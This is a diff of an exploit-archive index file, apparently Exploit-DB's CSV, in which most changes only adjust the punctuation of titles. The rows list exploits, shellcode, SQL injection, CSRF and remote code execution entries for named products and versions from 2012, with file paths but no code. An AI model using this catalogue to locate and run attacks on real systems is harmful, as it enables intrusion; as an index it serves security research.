18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include",2012-02-08,Vulnerability-Lab,multiple,webapps,0 -18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 +18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 @@ -16022,7 +16019,7 @@ id,file,description,date,author,platform,type,port 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF",2012-02-16,"Ivano Binetti",php,webapps,0 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 +18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 - Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 @@ -16033,7 +16030,7 @@ id,file,description,date,author,platform,type,port 18500,platforms/windows/local/18500.py,"Blade API Monitor Unicode Bypass (Serial Number BOF)",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18502,platforms/php/webapps/18502.html,"PlumeCMS 1.2.4 - CSRF",2012-02-20,"Ivano Binetti",php,webapps,0 -18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 +18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 - CSRF (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart - (search.php) SQLi",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"ForkCMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 @@ -16042,7 +16039,7 @@ id,file,description,date,author,platform,type,port 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 -18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 +18509,platforms/hardware/webapps/18509.html,"Dlink DCS series - CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 @@ -16061,20 +16058,20 @@ id,file,description,date,author,platform,type,port 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 -18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 +18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username BoF Pre-Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 - Profile",2012-02-29,Metasploit,windows,remote,0 -18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 -18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 +18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone - Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 +18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server - Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server Information Disclosure",2012-02-29,"SecPod Research",windows,remote,0 18543,platforms/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server Information Disclosure",2012-02-29,"SecPod Research",windows,remote,0 18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 -18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 +18546,platforms/windows/dos/18546.txt,"Novell Groupwise - Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 18548,platforms/windows/local/18548.rb,"VLC Media Player - RealText Subtitle Overflow",2012-03-02,Metasploit,windows,local,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 - eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 @@ -16103,7 +16100,7 @@ id,file,description,date,author,platform,type,port 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,windows,dos,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add user _t0r_ with password _Winner_ shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 -18587,platforms/windows/dos/18587.py,"Network Instrument Observer SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",windows,dos,0 +18587,platforms/windows/dos/18587.py,"Network Instrument Observer - SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",windows,dos,0 18616,platforms/php/webapps/18616.txt,"Pre Printing Press - product_desc.php (pid) SQL Injection",2012-03-18,"Easy Laster",php,webapps,0 18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 @@ -16131,7 +16128,7 @@ id,file,description,date,author,platform,type,port 18614,platforms/php/webapps/18614.txt,"PRE PRINTING STUDIO SQL Injection",2012-03-17,r45c4l,php,webapps,0 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 18621,platforms/windows/remote/18621.txt,"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow",2012-03-19,rgod,windows,remote,0 -18622,platforms/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Code Execution",2012-03-19,rgod,windows,remote,0 +18622,platforms/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution",2012-03-19,rgod,windows,remote,0 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Remote Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 @@ -16151,13 +16148,13 @@ id,file,description,date,author,platform,type,port 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 -18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0 +18644,platforms/php/webapps/18644.txt,"vBShout - Persistent XSS",2012-03-22,ToiL,php,webapps,0 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM - Multiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 -18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 +18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new - Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (CSRF/XSS) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 18655,platforms/php/webapps/18655.php,"phpFox 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 @@ -16213,21 +16210,20 @@ id,file,description,date,author,platform,type,port 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0 18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 -18730,platforms/multiple/remote/18730.rb,"Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",2012-04-11,Metasploit,multiple,remote,0 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 -18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server DoS Server 4.6.1.1995",2012-04-12,"Luigi Auriemma",hardware,dos,0 +18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - DoS",2012-04-12,"Luigi Auriemma",hardware,dos,0 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 -18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 +18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 -18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,Metasploit,windows,local,0 +18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,Metasploit,windows,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 @@ -16235,7 +16231,7 @@ id,file,description,date,author,platform,type,port 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0 18755,platforms/windows/dos/18755.c,"Windows - Afd.sys Proof of Concept (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 -18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 +18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - (.mp4) Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 @@ -16282,9 +16278,9 @@ id,file,description,date,author,platform,type,port 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 -18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 +18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 -18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 +18817,platforms/hardware/dos/18817.py,"Mikrotik Router - Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS",2012-05-02,"Lufeng Li",windows,dos,0 18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - (author/edit.php) Remote Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 @@ -16295,7 +16291,7 @@ id,file,description,date,author,platform,type,port 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 -18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 +18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection",2012-05-04,Metasploit,php,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18861,platforms/windows/local/18861.php,"PHP 5.4.3 - Code Execution (Win32)",2012-05-11,0in,windows,local,0 @@ -16303,7 +16299,7 @@ id,file,description,date,author,platform,type,port 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 18836,platforms/php/remote/18836.py,"PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection Exploit",2012-05-05,rayh4c,php,remote,0 -18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 +18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 18842,platforms/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 @@ -16329,7 +16325,7 @@ id,file,description,date,author,platform,type,port 18875,platforms/php/webapps/18875.txt,"Galette - (picture.php) SQL Injection",2012-05-13,sbz,php,webapps,0 18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 -18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 +18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager - Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 @@ -16337,20 +16333,20 @@ id,file,description,date,author,platform,type,port 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 -18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 +18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 -18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 +18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0Day)",2012-05-18,Cr4sh,windows,dos,0 18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,Metasploit,php,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,Metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection / XSS",2012-05-19,blake,php,webapps,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 -18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 +18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - .DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 -18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 +18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection",2012-05-21,WhiteCollarGroup,php,webapps,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,Metasploit,windows,local,0 @@ -16360,11 +16356,11 @@ id,file,description,date,author,platform,type,port 18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,Metasploit,php,webapps,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE PoC",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 -18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 +18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 -18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 +18920,platforms/multiple/dos/18920.txt,"Wireshark - Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 18921,platforms/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 -18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 +18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 @@ -16402,7 +16398,7 @@ id,file,description,date,author,platform,type,port 18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 -18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 +18973,platforms/windows/remote/18973.rb,"GIMP - script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"WordPress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16437,7 +16433,7 @@ id,file,description,date,author,platform,type,port 19022,platforms/php/webapps/19022.txt,"WordPress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19023,platforms/php/webapps/19023.php,"WordPress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy 